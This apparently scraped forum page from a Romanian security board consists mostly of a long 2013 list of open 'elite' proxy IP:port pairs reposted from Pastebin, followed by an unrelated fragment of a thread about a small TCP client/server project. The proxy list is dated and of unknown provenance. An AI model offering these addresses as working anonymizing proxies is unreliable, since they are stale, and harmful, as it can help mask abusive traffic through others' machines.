163.180.124.69:808 87.117.229.171:80 31.131.30.161:8089 202.171.253.111:80 222.73.242.137:84 60.220.212.60:18080 208.110.83.202:3128 31.131.30.161:7808 124.126.126.7:80 81.1.224.146:3128 220.233.207.139:80 208.110.83.202:7808 222.73.233.146:81 61.158.34.2:8080 93.78.47.20:3128 5.135.81.16:3128 180.246.230.103:80 193.53.4.252:8080 219.243.220.100:8080 77.251.219.80:80 109.195.23.55:3128 61.138.27.5:8080 116.228.55.217:80 89.44.124.12:80 119.36.87.32:82 222.73.233.146:85 222.73.233.146:83 222.73.242.137:83 222.223.155.99:9001 222.73.233.146:84 173.213.113.111:3128 69.197.132.68:3128 5.199.166.250:3128 199.15.248.179:3128 190.102.28.173:80 119.254.84.90:80 61.187.186.150:81 180.247.12.182:80 113.108.92.104:80 174.137.184.37:8080 221.10.40.236:82 199.30.136.117:3128 1.85.16.86:8888 122.96.59.103:83 122.96.59.103:82 95.241.139.55:80 218.249.86.131:554 119.36.87.26:80 119.36.87.26:82 60.195.251.213:80 190.102.2.71:80 172.245.9.56:7808 176.34.211.30:80 141.85.204.66:1920 202.142.20.204:8088 202.142.20.211:8088 58.215.137.145:3129 60.18.169.92:80 127.240.233.190:80 5.135.191.206:80 37.46.197.58:8089 62.45.154.240:80 202.112.123.2:80 54.247.99.253:80 188.142.59.116:80 14.53.34.90:3128 81.90.224.209:8080 187.45.182.9:8080 108.61.89.152:8089 206.72.194.6:443 77.250.146.5:80 84.200.43.92:80 221.181.192.29:81 205.196.211.66:3128 218.204.39.167:80 77.175.13.61:80 46.102.232.103:80 188.142.93.4:80 178.189.92.118:3129 173.45.91.40:8085 218.204.39.166:80 188.142.65.28:80 202.159.24.23:80 180.247.5.242:80 218.108.85.59:81 218.56.161.14:8118 81.9.110.98:3128 211.147.213.112:80 184.95.52.207:21104 83.239.214.100:3128 202.96.154.8:8000 172.245.20.109:8089 54.224.82.100:80 198.74.55.58:80 222.73.242.137:82 190.149.209.46:80 201.77.202.69:8090 222.73.242.137:85 188.142.2.134:80 95.215.61.164:8080 218.108.242.124:8080 121.22.72.61:8080 60.12.174.124:8090 121.240.238.160:80 209.190.112.237:3128 113.106.99.233:9000 59.148.224.190:80 77.175.84.246:80 79.129.72.226:9000 212.7.4.200:3128 112.199.89.158:6588 91.239.66.108:3128 77.175.79.225:80 188.142.59.102:80 113.106.99.239:9000 176.214.79.247:3128 202.142.20.6:8090 184.106.170.71:8787 5.199.164.214:8080 184.106.158.148:8787 218.203.121.84:8080 151.237.189.25:80 202.198.8.55:80 95.211.213.143:8080 211.1.228.96:80 164.77.196.75:80 203.171.231.36:62848 188.142.92.105:80 50.57.171.227:80 74.91.17.35:3128 60.216.99.222:80 42.120.50.45:14826 200.27.175.70:3128 46.18.244.54:80 124.227.191.70:9000 188.165.208.11:443 178.60.128.217:80 141.223.122.154:808 109.239.36.174:3128 37.251.107.74:80 199.45.9.180:80 134.181.9.145:9000 46.38.63.191:8080 119.97.244.222:9000 178.217.154.50:3128 103.22.181.247:80 60.247.77.199:8089 173.192.81.137:8080 24.132.76.164:80 213.73.146.218:80 111.223.88.132:8080 64.120.252.18:80 202.142.20.8:8090 199.127.99.219:3128 92.62.82.118:80 173.254.232.123:3128 77.175.13.93:80 123.242.172.4:80 218.62.29.154:80 188.142.6.94:80 124.227.191.69:9000 199.127.99.221:3128 77.175.14.205:80 200.12.63.104:8080 222.178.37.42:1337 218.28.59.149:8080 189.84.15.186:80 188.142.89.179:80 195.64.211.173:3128 83.128.15.240:80 188.142.77.201:80 213.111.227.92:54321 199.201.121.12:443 74.91.17.42:3128 77.175.12.50:80 173.208.246.132:3128 118.97.77.119:8080 106.187.101.178:3128 183.136.146.110:8085 114.113.156.33:8090 41.224.247.239:81 218.22.64.244:8080 124.207.34.91:808 61.28.43.204:8090 93.79.118.163:54321 183.181.25.248:80 119.184.214.18:808 113.106.99.241:9000 177.70.8.162:80 60.190.189.214:8123 87.174.110.211:8080 87.236.210.61:3128 122.194.10.198:80 78.107.239.206:54321 82.209.195.5:8080 173.255.250.38:8080 219.111.124.167:8000 62.64.7.245:3128 222.90.211.198:1337 109.86.203.184:54321 82.207.43.156:3128 37.77.51.162:80 190.208.41.84:3128 202.38.95.66:8080 173.255.142.13:80 183.105.252.141:8118 58.221.184.114:1337 77.175.77.202:80 189.75.118.154:80 107.22.112.11:8118 129.114.60.141:80 210.13.124.188:8080 195.138.81.100:3128 80.255.145.41:3128 213.0.62.70:80 82.187.108.146:8082 199.88.101.5:8080 202.103.114.13:88 202.112.50.140:8080 222.197.188.39:8080 221.7.43.71:1337 188.142.78.184:80 88.159.179.36:80 77.175.81.9:80 50.7.199.119:3128 184.73.235.9:80 113.105.65.111:8080 183.129.177.120:80 199.88.101.6:8080 80.94.238.54:3128 202.142.20.215:8088 96.126.105.156:80 188.142.70.81:80 212.34.181.124:3128 216.230.230.57:8089 199.115.94.245:80 202.194.6.227:8909 61.15.67.120:6673 218.22.180.45:8090 112.65.171.122:8080 113.204.166.90:8080 195.239.209.214:3128 222.178.12.38:6668 77.175.88.109:80 217.123.116.27:80 207.182.140.86:3128 113.106.99.235:9000 37.251.107.193:80 218.219.202.76:443 202.102.48.205:8080 84.105.67.157:80 218.63.203.202:9888 75.145.114.154:8118 202.108.251.214:8888 202.115.9.143:808 183.237.28.44:3128 68.97.243.226:36081 117.218.58.152:6588 37.251.107.222:80 58.211.195.86:8080 188.32.107.120:54321 188.142.44.83:80 211.147.226.172:80 211.147.226.169:80 198.154.120.98:3128 198.24.130.222:3128 211.147.226.170:80 119.254.66.7:5060 75.101.243.160:80 27.54.182.157:80 188.142.69.55:80 58.210.247.18:1337 61.28.39.52:8090 173.212.248.34:14416 115.151.26.86:3128 188.142.65.168:80 124.227.192.43:9000 95.87.69.59:3128 217.25.23.219:3128 87.79.33.226:81 202.46.129.120:443 173.212.195.172:8081 218.108.168.165:82 218.17.154.98:808 173.208.137.44:3128 122.228.218.163:8090 103.16.228.207:808 80.192.41.229:3128 200.62.71.41:8080 109.86.201.180:54321 212.33.12.234:80 78.63.208.158:54321 110.77.233.39:3128 89.148.197.27:3128 54.243.202.216:80 200.242.233.36:80 94.228.213.123:3128 212.204.161.180:80 201.76.149.60:3128 213.230.68.97:8081 183.129.141.15:80 192.210.210.219:3128 94.210.251.243:80 58.20.250.61:8080 115.182.10.144:80 61.28.43.205:8090 222.208.41.130:8090 77.175.85.148:80 218.28.16.170:3128 117.141.112.132:1337 180.183.2.147:8080 222.222.194.99:8090 60.247.92.242:6039 203.187.184.25:8888 221.193.245.16:8090 46.63.72.110:80 112.109.17.234:80 125.62.19.52:80 125.62.19.48:80 77.175.81.40:80 183.181.174.91:80 211.222.252.84:3129 Sursa: Coca Colas' Elite Proxies 5/29/13 - Pastebin.com
  25. Nytro
    Cea mai mare prostie, sa folosesti ditamai libraria, mai ales pentru un proiect de 20 de linii de cod. black_death_c4t Deci care e problema? "Se cere un server si unul sau mai multi clienti." - Nu e server pe TCP?
×
×
  • Create New...